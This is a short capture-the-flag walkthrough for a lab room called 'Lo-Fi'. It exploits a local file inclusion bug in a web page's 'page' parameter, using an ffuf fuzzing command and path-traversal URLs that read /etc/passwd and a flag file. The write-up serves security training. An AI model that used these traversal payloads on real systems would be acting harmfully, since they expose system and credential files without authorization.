Lo-Fi

Want to hear some lo-fi beats, to relax or study to? We've got you covered! - by cmnatic

The following post by 0xb0b is licensed under CC BY 4.0

In this challenge, we skip the Nmap scan. Since the room description already asks us to visit a web page, and we should test for local file inclusion here. On the Index page we have links to different genres.

Clicking on one of the links, we get redirected by the page parameter. There is also a filter for at least absolute path.

http://lo-fi.thm/?page=

We test this parameter for LFIs with the LFI-Jhaddix.txt wordlist using FFuF. And we have some hits.

ffuf -w /usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt -u "http://lo-fi.thm/?page=FUZZ" -fl 124

We test the simplest one to include the /etc/passwd file. And we are successful.

http://lo-fi.thm/?page=../../../etc/passwd

Now we want to include the /flag.txt file, that we are asked for to get in the root directory of the system, and we have a hit.

http://lo-fi.thm/?page=../../../flag.txt

PreviousLight NextSilver Platter

Last updated 1 year ago

Was this helpful?